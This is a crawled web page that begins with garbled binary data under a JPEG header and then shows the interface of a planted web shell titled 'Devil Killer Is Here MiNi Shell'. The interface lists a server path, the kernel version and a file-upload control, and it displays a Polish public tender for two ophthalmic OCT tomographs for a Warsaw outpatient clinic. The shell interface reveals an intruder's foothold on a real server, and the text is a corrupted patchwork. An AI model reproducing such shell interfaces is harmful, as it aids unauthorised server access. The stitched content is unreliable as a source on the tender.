JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240913/0049977601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa 2 szt. spektralnych tomografów okulistycznych z angiografią SOCT wraz z instalacją, uruchomieniem i szkoleniem personelu medycznego Zamawiającego oraz przeprowadzeniem testów bezpieczeństwa”, </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Zespół Publicznych Zakładów Lecznictwa Otwartego Warszawa-Ochota</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010202670</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szczęśliwicka 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-353</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@warszawa-ochota.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpzlo-ochota.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa 2 szt. spektralnych tomografów okulistycznych z angiografią SOCT wraz z instalacją, uruchomieniem i szkoleniem personelu medycznego Zamawiającego oraz przeprowadzeniem testów bezpieczeństwa”, </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-640ec1ef-fb77-4b00-8a1b-89ce93dfae2e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00499776</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00041802/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.9 DOSTAWA 2 SZT. TOMOGRAFÓW KOMPUTEROWYCH DO BADANIA DNA OKA</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/974558 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z dokumentacją postępowania, m.in. Rozdział X i XI SWZ.<br/>Oferta powinna być:<br/>1)	sporządzona na podstawie załączników do niniejszej SWZ, w języku polskim,<br/>2)	złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem<br/>platformazakupowa.pl, pod adresem: <br/>https://platformazakupowa.pl/transakcja/974558 <br/>podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym, lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>Podpisy kwalifikowane, wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>W przypadku wykorzystania formatu podpisu XAdES zewnętrzny, Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.<br/>Zgodnie z definicją dokumentu elektronicznego z art. 3 ust. 2 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2024 r., poz. 307), opatrzenie pliku zawierającego skompresowane dane kwalifikowanym podpisem elektronicznym, jest jednoznaczne z podpisaniem oryginału dokumentu, z wyjątkiem kopii poświadczonych odpowiednio przez innego Wykonawcę ubiegającego się wspólnie z nim <br/>o udzielenie zamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, albo przez podwykonawcę.<br/>Max. rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do Rozporządzenia Rady Ministrów w sprawie KRI, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, zwanego dalej Rozporządzeniem KRI.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>W celu ewentualnej kompresji danych, Zamawiający rekomenduje wykorzystanie aplikacji kompresującej w formacie zip.<br/>Wśród rozszerzeń powszechnych, a niewystępujących w Rozporządzeniu KRI, występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp, służącej do składania podpisu osobistego, który wynosi maksymalnie 5MB.<br/>W przypadku stosowania przez Wykonawcę kwalifikowanego podpisu elektronicznego:<br/>•	ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę, na rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PAdES, <br/>•	pliki w innych formatach niż .pdf, zaleca się opatrzyć podpisem w formacie XAdES <br/>o typie zewnętrznym. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym,<br/>•	Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów, np.: osobistym <br/>i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Pani/Pana danych osobowych jest Samodzielny Zespół Publicznych Zakładów Lecznictwa Otwartego Warszawa–Ochota (dalej jako SZPZLO) z siedzibą <br/>w Warszawie 02–353, przy ul. Szczęśliwickiej 36, adres e-mail: sekretariat@szpzlo-ochota.pl.<br/>2.	Kontakt z inspektorem ochrony danych SZPZLO jest możliwy pod adresem:<br/>a.	SZPZLO Warszawa – Ochota, ul. Szczęśliwicka 36, 02 – 353 Warszawa<br/>b.	e-mail: iod@szpzlo-ochota.pl<br/>3.	Dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie <br/>o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.) (dalej: RODO) w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną ich przetwarzania są przepisy ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605, z późn. zm.) (dalej: prawo zamówień publicznych), a także ustawa z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r., poz. 164, z późn. zm.)<br/>4.	Odbiorcami danych będą podmioty uprawnione na podstawie przepisów prawa do ich otrzymania oraz podmioty świadczące SZPZLO usługi w zakresie IT.<br/>5.	Dane osobowe będą przechowywane, zgodnie z art. 78 prawa zamówień publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>6.	Ma Pani/Pan:<br/>- prawo dostępu do swoich danych oraz otrzymania ich kopii <br/>- prawo do sprostowania swoich danych;<br/>- prawo do ograniczenia przetwarzania danych <br/>7.	Ma Pan/Pani prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>8.	Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych.<br/>9.	Pani/Pana dane nie będą podlegać zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z dokumentacją postępowania m.in. Rozdział XXIII SWZ oraz niektóre załączniki do projektu umowy, który stanowi Załącznik nr 3 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2511-16-IS/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: „Dostawa 2 (dwóch) sztuk spektralnych tomografów okulistycznych z angiografią SOCT wraz z instalacją, uruchomieniem i szkoleniem personelu medycznego Zamawiającego oraz przeprowadzeniem testów bezpieczeństwa”, w dalszej treści zwany również „Sprzętem”.<br/>2.	Nazwa i kod dotyczący przedmiotu zamówienia, określony we Wspólnym Słowniku Zamówień publicznych (CPV): 33115100-0 – skanery do tomografii komputerowej; 33100000-1 – urządzenia medyczne.<br/>3.	Opis przedmiotu zamówienia, zawierający opis wymaganych funkcjonalności i parametrów technicznych, zamieszczono w Specyfikacji technicznej - OPZ, która stanowi Załącznik <br/>Nr 2 do SWZ oraz projekcie Umowy, stanowiącym Załącznik nr 3 do SWZ. <br/>4.	Sprzęt powinien posiadać certyfikat CE i być dopuszczony do obrotu na terenie Rzeczpospolitej Polskiej, a także posiadać wymagane prawem atesty i świadectwa dopuszczające do obrotu na terytorium Rzeczypospolitej Polskiej, o ile takie atesty <br/>i świadectwa będą wymagane prawem w odniesieniu do danego produktu, na co Wykonawca winien posiadać odpowiednie dokumenty i przedstawić je na każde żądanie Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33115100-0 - Skanery do tomografii komputerowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33100000-1 - Urządzenia medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">4.	W toku badania i oceny ofert, Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie <br/>w związku z realizacją przedmiotu zamówienia.<br/>6.	Punktacja przyznawana ofertom, w poszczególnych kryteriach oceny ofert, będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>7.	Każda Oferta może otrzymać maksymalnie 100 pkt.<br/>8.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>1)	odpowiada wszystkim wymaganiom przedstawionym w Ustawie,<br/>2)	odpowiada wszystkim wymaganiom przedstawionym w SWZ;<br/>3)	uzyskała najwyższą ilość punktów, zgodnie z kryterium oceny ofert.<br/>9.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty <br/>ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający zastosuje procedurę określoną w art. 248 Ustawy.<br/>10.	Jeżeli zaoferowana przez Wykonawcę cena, lub jej istotne części składowe, będą wydawały się rażąco niskie w stosunku do przedmiotu zamówienia lub będą budzić wątpliwości Zamawiającego co do możliwości wykonania przedmiotu zamówienia zgodnie z wymaganiami określonymi w SWZ, Zamawiający zażąda od Wykonawcy wyjaśnień, w tym złożenia dowodów w zakresie wyliczenia ceny lub jej istotnych części, zgodnie z art. 224 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. oświadczenie na podstawie art. 125 ust. 1 Ustawy,<br/>2. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy, o braku przynależności do tej samej grupy kapitałowej,<br/>3. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy, sporządzonych nie wcześniej niż 3 (trzy) miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie na podstawie art. 125 ust. 1 Ustawy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> pełnomocnictwo - o ile dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium wysokości 7 000,00 zł (słownie: siedem tysięcy złotych 00/100).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium należy utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, <br/>z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Ustawy.<br/>4.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/>z dnia 09 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/>5.	Wadium uznaje się za wniesione w terminie, gdy:<br/>1)	wnoszone w formie pieniądza zostało uznane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert;<br/>2)	wnoszone w formach innych niż pieniądz – Wykonawca zamieści bezpośrednio na stronie internetowej prowadzonego Postępowania pod adresem: <br/>https://platformazakupowa.pl/transakcja/974558 <br/>w formie elektronicznej oryginał dokumentu wadialnego, opatrzony kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia tj. wystawcę dokumentu, potwierdzającego wniesienie wadium, nie później niż przed upływem terminu składania ofert.<br/>6.	Wadium wnoszone w pieniądzu wpłaca się przelewem na poniżej wskazany rachunek bankowy Zamawiającego:<br/>22 1240 5918 1111 0000 4907 6679 (w PKO S.A.).<br/>7.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>8.	Wadium wnoszone w formach innych niż pieniądz:<br/>1)	musi obejmować wszystkie przesłanki zatrzymania wadium określone w art. 98 ust. 6 Ustawy;<br/>2)	musi zawierać stwierdzenie, że gwarant lub poręczyciel zobowiązuje się nieodwołalnie <br/>i bezwarunkowo pokryć wszelkie zobowiązania Wykonawcy wobec Zamawiającego wynikające z zapisów SWZ dotyczące wadium, do wysokości gwarantowanej kwoty, <br/>na pierwsze żądanie Zamawiającego przedstawione gwarantowi w formie pisemnej;<br/>3)	musi wskazywać nazwę i numer Postępowania;<br/>4)	nie może wprowadzać żadnych dodatkowych warunków, od spełnienia których zależy spełnienie świadczeń z tytułu udzielonej gwarancji lub poręczenia.<br/>9.	Wadium wnoszone w innych niż w pieniądzu, dopuszczonych przez Zamawiającego formach, Wykonawca składa w formie elektronicznej za pośrednictwem Platformy Zakupowej, o której mowa w Rozdziale X i dalszych SWZ, pod adresem:<br/>https://platformazakupowa.pl/transakcja/974558 poprzez wczytanie oryginału dokumentu wadialnego, tj. opatrzonego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia.<br/>10.	Zamawiający wymaga, aby wadium wniesione w formie innej niż pieniądz podpisane było kwalifikowanym podpisem elektronicznym przez gwaranta tj. wystawcę gwarancji / poręczenia. <br/>11.	Wadium złożone w pieniądzu Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. Wadium złożone w formie innej niż pieniężna Zamawiający zwróci poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>12.	Jeżeli wadium nie zostanie wniesione lub zostanie wniesione w sposób nieprawidłowy, Zamawiający odrzuci ofertę Wykonawcy, zgodnie z art. 226 ust. 1 pkt 14 Ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku składania oferty wspólnej, tj. oferty Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, zgodnie z art. 58 ust. 2 Ustawy, do oferty należy dołączyć pełnomocnictwo, podpisane przez wszystkich partnerów, ustanawiające pełnomocnika Wykonawców do reprezentowania ich w Postępowaniu albo do reprezentowania 